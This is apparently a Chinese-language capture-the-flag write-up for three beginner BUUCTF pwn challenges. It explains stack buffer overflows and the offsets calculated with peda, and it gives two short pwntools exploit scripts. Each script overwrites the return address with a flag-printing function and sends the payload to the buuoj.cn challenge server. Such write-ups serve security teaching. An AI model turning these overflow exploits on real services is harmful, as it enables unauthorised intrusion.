buuctf pwn wp---part1

pwn难啊

 

1、test_your_nc

测试你nc，不用说，连上就有。

2、rip

ida中已经包含了system函数：

 

 

 

溢出，覆盖rip为fun函数，peda计算偏移为23:

from pwn import *

#context.update(arch = 'i386', os = 'linux', timeout = 1)

p = remote('node3.buuoj.cn',27146)
#p = process('./pwn1')

flag_addr = 0x40118A
payload = 0xf*'a' +'a'*8 + p64(flag_addr)

#print p.recv()
p.sendline(payload)
p.interactive()

 

3、warmup_csaw_2016

ida中，可以看到，存在溢出

 

 

 

 

 

 

 

 

 使用peda计算偏移为72

 

 

from pwn import *

#context.update(arch = 'i386', os = 'linux', timeout = 1)

p = remote('node3.buuoj.cn',29050)
#p = process('./warmup_csaw_2016')

catflag_addr = 0x40060d

payload = 'A'*72 + p64(catflag_addr)

#print p.recv()
p.sendline(payload)

p.interactive()

exp